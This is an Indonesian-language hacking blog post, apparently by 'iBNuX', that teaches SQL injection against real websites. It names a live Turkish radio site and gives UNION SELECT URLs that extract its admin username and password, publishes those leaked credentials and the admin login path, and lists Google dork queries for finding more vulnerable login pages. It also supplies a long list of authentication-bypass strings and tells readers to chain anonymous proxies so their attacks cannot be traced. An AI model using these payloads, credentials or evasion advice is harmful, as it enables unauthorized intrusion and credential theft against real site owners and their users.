tutorial ini untuk belajar menggunakan sql injection, tetapi tidak 100% ampuh,
coz sudah banyak website yang sudah mengamankan systemnya.

Untuk mencari targetnya, silahkan menggunakan keyword yang tepat ...

ex : inurl:/devami.asp?id= geri

Korban yang saya dapatkan adalah :

http://www.radyopinarim.com/haber1/devami.asp?id=1


Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 1-nya.

Yang anda dapatkan adalah kurang lebih error yang seperti ini



Microsoft OLE DB Provider for ODBC Drivers hata '80040e14'

[Microsoft][ODBC Microsoft Access Sürücüsü] 'id=' sorgu
ifadesi içindeki Sözdizimi hatasý (eksik iþleç)

/haber1/devami.asp, satýr 8



Dari sini silahkan tepuk tangan, karena anda masih bisa mengeksploitasi situs
ini.

Untuk mencari username nya anda tinggal mengganti angka 1 dengan

-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

kurang lebih alamat di browser seperti ini :

http://www.radyopinarim.com/haber1/devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin


Yang saya dapatkan usernamenya adalah Kadrius

dan untuk mencari passwordnya

:



-1+union+select+0,sifre,2,3,4,5,6,7+from+admin

passwordnya adalah 19901990

Untuk login sebagai admin anda tinggal balik kehalaman

/admin/kontrol.asp

---------------step by steep-------------------

SEARCH:



adminlogin.asp

login.asp



dengan dua kata pencarian ini kamu bisa menemukan banyak target untuk dipilih...
mencari mana yang mempunyai kelemahan







INJECTION STRINGS:HOW ?



disini ini yang paling mudah!! sangat simple lo.



pada bagian login cukup masukkan yang seperti ini:



user:admin (ngga perlu harus admin)

pass:' or 1=1--



atau



user:' or 1=1--

admin:' or 1=1--



beberapa situs kadang hanya mengharuskan memasukkan passnya aja



password:' or 1=1--





injeksi yg paling mudah menggunakan ' or 1=1--

combo example:



yang paling penting mencari target operasinya ketikkan kata kunci dibawah ini
di goggle



inurl:login.asp

index of:/admin/login.asp



seperti ini: index of login.asp



hasilnya:



http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search





17,000 target yang memungkinkan untuk dicoba :D





dalam melakukan aksi kamu, lebih baik menggunakan proxy agar ISP tidak memblok
kamu, sumpah beneren pisan!!

warnet yang dulu iBNuX pake tuk nyerang didatangin ISPnya karena dapat pengaduan
dari yg punya websitenya :D

jadi cari aja proxy gratisan yang bisa anonymously jadi kamu ngga akan ketahuan
datangnya darimana, lebih bagus lagi kalo menggunakan proxy chain

akan lebih susah dilacak(trace) contoh : iBNuX
---> proxy1(jerman)--->
proxy2(jepang)--->proxy3(newyork)--->target

sebaiknya dalam melakukan penyerangan selalu menggunakan proxy anonymous

gunakan variasi injection dibawah ini dalam membobolnya
:D



admin'--



' or 0=0 --



" or 0=0 --



or 0=0 --



' or 0=0 #



" or 0=0 #



or 0=0 #



' or 'x'='x



" or "x"="x



') or ('x'='x



' or 1=1--



" or 1=1--



or 1=1--



' or a=a--



" or "a"="a



') or ('a'='a



") or ("a"="a



hi" or "a"="a



hi" or 1=1 --



hi' or 1=1 --



hi' or 'a'='a



hi') or ('a'='a



hi") or ("a"="a


cara yg paling penting adalah membuat error dalam
script yg ada di page maupun dalam melakukan query, karena dr situ kita bisa
lihat info yg penting.

carilah error page sebanyak-banyaknya sebagaimana para hacker mencari info di
tonk sampah.



buat pengetahuan, iBNuX ngga
bertanggung jawab kalo anda menggunakannya untuk kejahatan, tapi kalo berhasil
bagi-bagi yah :))

Tidak ada komentar: